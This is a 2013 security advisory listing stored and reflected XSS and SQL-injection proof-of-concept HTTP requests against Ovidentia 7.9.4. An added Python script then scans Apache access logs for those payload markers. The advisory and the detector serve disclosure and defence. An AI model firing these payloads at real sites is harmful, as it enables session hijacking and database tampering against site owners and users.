Ovidentia 7.9.4 Multiple Remote Vulnerabilities

Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4

Summary: Ovidentia is both a content management system (CMS) and a collaborative environment (Groupware).

Desc: Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.7
           MySQL 5.5.25a

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5154
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php

08.08.2013

---

============================================================
#1 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

tg=users
idx=Create
pos=A
grp=
widget_filepicker_job_uid[]=52154a53cc0de
user[nickname]=">
user[password1]=pass123
user[password2]=pass123
user[notifyuser]=0
user[sendpwd]=0
user[sn]=Testingusio
user[mn]=M
user[givenname]=Testa
user[email]=">

============================================================
#2 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

user[id]=2
tg=user
idx=Modify
item=2
pos=
grp=
widget_filepicker_job_uid[]=52154bde9410a
user[nickname]=test
user[setpwd]=0
user[password1]=
user[password2]=
user[sendpwd]=0
user[sn]=">
user[mn]=M
user[givenname]=">
user[email]=lab@zeroscience.mk

GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1

============================================================
#3 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

Submit2=Update
idx=modify
item=1
ovmldetail=">
ovmlembedded=">
tg=admoc
update=ovmldb

============================================================
#4 - Reflected XSSs
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=users&bupd="> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent=">&uid=widget_acl99&levels=2&id_delegation=0
GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A">&grp=&sSearchText= HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"> HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_&tg=usrTskMgr
GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman

============================================================
#5 - SQL Injection
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2

# Iranian Exploit DataBase = http://IeDb.Ir [2013-08-22]
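The GET requests under #4 and #5 are visible in a web server's access log, which makes them a practical detection target for site operators running an unpatched version. The script below is an added example, not part of the advisory and not Ovidentia code: it parses Apache combined-format log lines, URL-decodes each query-string parameter and flags the markers the proof-of-concept values rely on (an attribute/tag breakout, an inline event handler, a javascript: URI, a stray SQL quote). The log lines, client addresses and marker heuristics are constructed for the example. The POST-based submissions in #1 to #3 carry their payloads in the request body, which a standard access log does not record, so those need application-level logging or a reverse-proxy/WAF rule rather than this scan.

```python
"""Scan constructed Apache access-log lines for the request patterns seen in
ZSL-2013-5154 (added example; log lines and heuristics are constructed)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Fields of the Apache "combined" log line that the scan needs (constructed regex).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)

# Markers modelled on the advisory's proof-of-concept values; each is checked
# against the URL-decoded parameter value, so %22%3E and "> are treated alike.
MARKERS = {
    "html_breakout": re.compile(r'"\s*>|<\s*/?[a-z]'),           # "> closes an attribute/tag, <x opens one
    "event_handler": re.compile(r'\bon[a-z]+\s*=', re.I),        # onmouseover=...
    "js_uri":        re.compile(r'javascript\s*:', re.I),        # javascript: in a URL-typed parameter
    "sql_quote":     re.compile(r"'\s*(or|and|union|--|#|;|$)", re.I),  # 1'  or  ' or ...
}

# Constructed sample log (not real traffic): one benign request, four modelled
# on the advisory's GET proofs of concept, and one unparsable line.
LOG_LINES = [
    '203.0.113.5 - - [22/Aug/2013:10:00:01 +0200] "GET /ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText=Testa HTTP/1.1" 200 5123',
    '203.0.113.5 - - [22/Aug/2013:10:00:07 +0200] "GET /ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2 HTTP/1.1" 200 812',
    '203.0.113.9 - - [22/Aug/2013:10:01:13 +0200] "GET /ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1" 200 2211',
    '203.0.113.9 - - [22/Aug/2013:10:01:20 +0200] "GET /ovidentia/index.php?ids=1%22onmouseover=prompt(16)%3E&idx=hpriv&tg=topman HTTP/1.1" 200 1900',
    '198.51.100.2 - - [22/Aug/2013:10:02:00 +0200] "GET /ovidentia/index.php?tg=users&bupd=%22%3E HTTP/1.1" 200 4400',
    'this line is not in combined log format and is skipped',
]


def scan_params(target):
    """Return {parameter: [marker names]} for every suspicious query parameter
    in a request target such as /ovidentia/index.php?tg=users&bupd=%22%3E."""
    # Apache writes a literal quote in the request line as \" ; undo that before parsing.
    query = urlsplit(target.replace('\\"', '"')).query
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        found = [marker for marker, rx in MARKERS.items() if rx.search(value)]
        if found:
            hits[name] = found
    return hits


def scan_log(lines):
    """Parse each access-log line and collect one finding per flagged parameter.
    Lines that do not match the combined format are skipped rather than raising."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, markers in scan_params(m["target"]).items():
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "param": param, "markers": markers})
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f"{f['ts']} {f['ip']} param={f['param']} markers={','.join(f['markers'])}")
```

Run it as-is to scan the embedded sample, or feed `scan_log()` the lines of a real `access.log`. The heuristics are deliberately narrow (a quote followed by an SQL keyword or nothing, a quote-then-angle-bracket, an `on*=` handler, a `javascript:` prefix), so legitimate search text with an apostrophe in the middle of a word does not trip them; widen them only with a review of the false-positive rate on your own traffic.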